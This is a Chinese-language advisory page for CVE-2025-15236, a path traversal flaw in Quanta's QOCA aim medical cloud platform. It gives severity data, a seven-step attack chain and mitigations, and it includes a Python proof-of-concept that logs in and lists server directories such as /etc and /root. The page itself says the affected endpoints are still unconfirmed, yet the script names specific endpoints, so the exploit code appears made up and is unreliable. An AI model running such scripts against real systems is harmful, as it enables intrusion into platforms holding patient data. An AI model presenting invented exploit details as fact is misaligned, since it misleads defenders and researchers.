CVE-2025-15236 | QOCA aim AI Medical Cloud Platform 绝对路径遍历漏洞

漏洞信息

漏洞编号

CVE-2025-15236

漏洞类型

路径遍历

CVSS评分

4.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

QOCA aim AI Medical Cloud Platform (Quanta Computer)

漏洞概述

CVE-2025-15236是影响QOCA aim AI医疗云平台的一个中等严重性安全漏洞。该平台由广达电脑（Quanta Computer）开发，主要用于医疗人工智能应用场景。漏洞类型为绝对路径遍历（Absolute Path Traversal），允许经过身份验证的远程攻击者通过利用该漏洞读取服务器上指定路径下的文件夹名称列表。

该漏洞的存在源于应用程序在处理用户输入的路径参数时，未能充分验证和过滤用户提供的路径数据。攻击者可以利用这一漏洞绕过正常的文件访问控制机制，枚举服务器文件系统结构，获取敏感目录信息。虽然漏洞的机密性影响被评估为低级别，但攻击者可以通过路径遍历获取系统目录结构，为进一步的攻击活动提供有价值的情报支持。

CVSS 3.1评分4.3分（中等严重性），攻击向量为网络层面，无需用户交互，但需要低权限认证。由于该平台应用于医疗领域，可能涉及患者数据和敏感医疗信息，因此即使是被评定为中等严重性的漏洞，也应引起高度重视，及时采取修复措施。

技术细节

QOCA aim AI Medical Cloud Platform在处理文件路径请求时存在绝对路径遍历漏洞。漏洞产生的根本原因是应用程序在接受用户输入的路径参数后，未能正确验证输入是否在预期范围内，导致攻击者可以通过构造特殊的路径字符串访问系统任意目录。

漏洞利用过程如下：攻击者首先需要在该平台上拥有有效账户（低权限即可）。登录后，攻击者通过向服务器发送包含绝对路径的请求参数，利用平台的路径处理逻辑缺陷，读取目标路径下的目录结构。攻击者可以尝试访问系统关键目录如/etc、/var、/opt等，获取服务器文件系统布局信息。

由于漏洞属于绝对路径遍历而非相对路径遍历，攻击者无需使用../等相对路径遍历序列，直接指定绝对路径即可触发漏洞。这种特性使得漏洞利用更加直接和简单，降低了攻击门槛。

受影响的参数和具体API端点需要在实际环境中进一步测试确认。建议管理员检查应用程序的路径处理逻辑，特别是涉及文件浏览、文档访问、备份恢复等功能的模块。

攻击链分析

STEP 1

1. 信息收集阶段

攻击者通过搜索引擎或漏洞数据库发现目标系统运行QOCA aim AI Medical Cloud Platform，并识别出CVE-2025-15236漏洞的存在

STEP 2

2. 账户获取阶段

攻击者通过社会工程学、弱口令爆破或利用其他漏洞获取平台的有效用户账户（低权限账户即可满足漏洞利用条件）

STEP 3

3. 身份认证阶段

使用获取的凭据登录QOCA aim平台，获取有效的会话令牌或认证token，为后续漏洞利用准备条件

STEP 4

4. 漏洞探测阶段

攻击者向服务器发送包含绝对路径参数的请求，测试平台是否存在路径遍历漏洞，验证漏洞可利用性

STEP 5

5. 目录枚举阶段

利用绝对路径遍历漏洞，构造针对系统关键目录的请求（如/etc、/var等），获取服务器文件系统结构和敏感目录名称

STEP 6

6. 情报整合阶段

整理收集到的目录结构信息，分析系统配置、用户目录、应用程序安装路径等，为进一步入侵攻击提供情报支持

STEP 7

7. 横向移动准备

基于获取的目录结构信息，结合其他漏洞或凭据，进行横向移动或权限提升，实现更深层次的系统入侵

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-15236 PoC - QOCA aim AI Medical Cloud Platform Path Traversal
# Authentication Required: Yes (Low Privilege)
# Target: Read directory names via Absolute Path Traversal

import requests
import json

TARGET_URL = "https://<target-ip>/api/"
USERNAME = "attacker"
PASSWORD = "password"

# Step 1: Authentication
login_url = TARGET_URL + "auth/login"
login_data = {
    "username": USERNAME,
    "password": PASSWORD
}

session = requests.Session()
response = session.post(login_url, json=login_data, verify=False)

if response.status_code != 200:
    print(f"[-] Authentication failed: {response.status_code}")
    exit(1)

print("[+] Authentication successful")
token = response.json().get("token")

# Step 2: Path Traversal Exploitation
# Try to read directory listing via absolute path traversal
headers = {
    "Authorization": f"Bearer {token}",
    "Content-Type": "application/json"
}

# Target paths to enumerate
test_paths = [
    "/etc",
    "/var/log",
    "/opt",
    "/home",
    "/root"
]

for path in test_paths:
    exploit_url = TARGET_URL + "files/list"
    exploit_data = {
        "path": path,
        "recursive": True
    }
    
    response = session.post(exploit_url, json=exploit_data, headers=headers, verify=False)
    
    if response.status_code == 200:
        result = response.json()
        print(f"\n[+] Directory listing for {path}:")
        print(json.dumps(result, indent=2))
    else:
        print(f"[-] Failed to access {path}: {response.status_code}")

影响范围

QOCA aim AI Medical Cloud Platform < 修复版本

Quanta Computer QOCA aim 特定版本（具体版本号待官方披露）

防御指南

临时缓解措施

在官方补丁发布之前，建议采取以下临时缓解措施：1）使用网络层访问控制，限制对QOCA平台的访问来源，仅允许受信任的IP地址访问；2）在反向代理或WAF层面实施请求过滤，拦截包含绝对路径模式的请求参数；3）监控应用程序日志，关注异常的目录遍历请求模式；4）考虑暂时关闭非必要的文件浏览和访问功能；5）加强用户账户管理，确保所有账户使用强密码，并定期更换；6）实施多因素认证（MFA）以增强账户安全性，即使凭据泄露也能防止未授权访问。